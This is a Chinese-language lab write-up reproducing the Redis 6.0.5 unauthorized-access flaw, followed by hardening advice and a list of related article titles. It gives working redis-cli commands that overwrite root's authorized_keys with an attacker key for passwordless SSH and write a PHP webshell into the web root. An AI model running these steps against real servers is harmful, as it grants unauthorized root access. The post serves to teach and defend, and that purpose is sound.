Redis v6.0.5未授權訪問漏洞復現
Redis因配置不當和未授權訪問。導致無需認證就可以訪問到內部資料,可導致敏感資訊洩露,也可以通過config 命令,可以進行寫檔案作操。
復現環境:
伺服器: Centos 7.5 Redis Server
redis v6.0.5
redis.conf 檔案以下兩處進行修改
1、註釋掉 bind 127.0.0.1
2、protected-mode no
攻擊機:Centsos 7.5 Redis Client
復現過程:
1、 服務端啟動 redis server
2、攻擊機連線server
./src/redis-cli -h 192.168.195.110
預設用6379埠登陸
無需認證即可登陸到server,並可執行命令。
3、攻擊機上ssh-keygen生成公鑰和私鑰,將公鑰寫入伺服器,使用私鑰登陸,
一路按回車即可,預設是 rsa 型別的金鑰
4、將公鑰內容複製
[root@centos7200 ~]# cat /root/.ssh/id_rsa.pub 檢視後複製內容
5、通過redis-cli登陸到server 後,輸入以下命令:
192.168.195.110:6379> config set dir /root/.ssh/ 將備份路徑設為/root/.ssh/
192.168.195.110:6379> config set dbfilename authorized_keys
將複製的id_rsa.pub內容貼上進來
192.168.195.110:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADARsYKq6juYwzKvVj1oq部分馬塞克V84EvYaRctI3QhQPJcz5DTD/7jG2Hn3fjt+mj/wB root@centos7-200\n\n\n"
192.168.195.110:6379>save
6、攻擊機可以通過 ssh 免密登陸到server
7、如果Server上開啟了web服務,可以寫webshell,
開啟httpd服務:
登陸伺服器後執行以下命令:
192.168.195.110:6379> config set dir /var/www/html
OK
192.168.195.110:6379> config set dbfilename webshell.php
OK
192.168.195.110:6379> set x “<?php phpinfo(); ?>”
OK
192.168.195.110:6379> save
OK
訪問wehshell.php
防護措施
1、為Redis服務單獨建立 user和home目錄,低許可權執行,並且配置禁止登陸
2、為Redis新增密碼驗證
可以通過修改redis.conf檔案來為Redis新增密碼驗證
requirepass mypassword
3、禁止外網訪問 Redis
可以通過修改redis.conf檔案來使得Redis服務只在當前主機可用
bind 127.0.0.1
4、啟動 保護模式
protected-mode yes
相關文章
- 【漏洞復現】Redis未授權訪問漏洞Redis
- Redis未授權漏洞復現Redis
- Redis 未授權訪問漏洞利用Redis
- 利用redis未授權訪問漏洞(windows版)RedisWindows
- 銘說 | Redis未授權訪問漏洞GetshellRedis
- Redis未授權訪問漏洞利用總結Redis
- mongodb未授權訪問漏洞MongoDB
- Redis 未授權訪問漏洞(附Python指令碼)RedisPython指令碼
- 系統滲透漏洞の未授權訪問
- JBOSS未授權訪問
- Mongodb未授權訪問漏洞全網探測報告MongoDB
- Java安全漏洞:Druid未授權訪問解決JavaUI
- Linux sudo 漏洞可能導致未經授權的特權訪問Linux
- 利用CouchDB未授權訪問漏洞執行任意系統命令
- spark未授權RCE漏洞Spark
- Redis 未授權訪問缺陷可輕易導致系統被黑Redis
- 從零開始學習各種常見未授權訪問漏洞
- 多款Intel產品未授權訪問漏洞(CVE-2017-5689)Intel
- Druid未授權訪問實戰利用UI
- Etcd REST API 未授權訪問漏洞暴露 750MB 密碼和金鑰RESTAPI密碼
- 記一次特別的未授權訪問
- 【雲原生攻防研究】Istio訪問授權再曝高危漏洞
- SSRF結合Redis未授權的打法Redis
- SaltStack未授權訪問及命令執行漏洞分析(CVE-2020-16846/25592)
- 基於Docker的MongoDB實現授權訪問DockerMongoDB
- php反序列化和redis未授權PHPRedis
- MySQL建立使用者授權訪問MySql
- 配置apache授權訪問目錄(轉)Apache
- Hadoop Yarn REST API未授權漏洞利用挖礦分析HadoopYarnRESTAPI
- CVE-2021-45232 Apache APISIX 從未授權訪問到RCEApacheAPI
- mysql8.0授權root遠端訪問MySql
- Flipboard 資料庫未經授權訪問使用者賬號密碼洩露資料庫密碼
- HTTP 錯誤401.1 - 未經授權:訪問由於憑據無效被拒絕HTTP
- 蘋果補上了可被未授權收集感測器資料的iPhone漏洞蘋果iPhone
- 瞭解如何使用JSON Web令牌(JWT)實現訪問授權驗證JSONWebJWT
- [BUG反饋]分類授權漏洞
- Oracle建立表空間、建立使用者、授權、授權物件的訪問以及檢視許可權集合Oracle物件
- [BUG反饋]許可權管理 -> 訪問授權 點選後報錯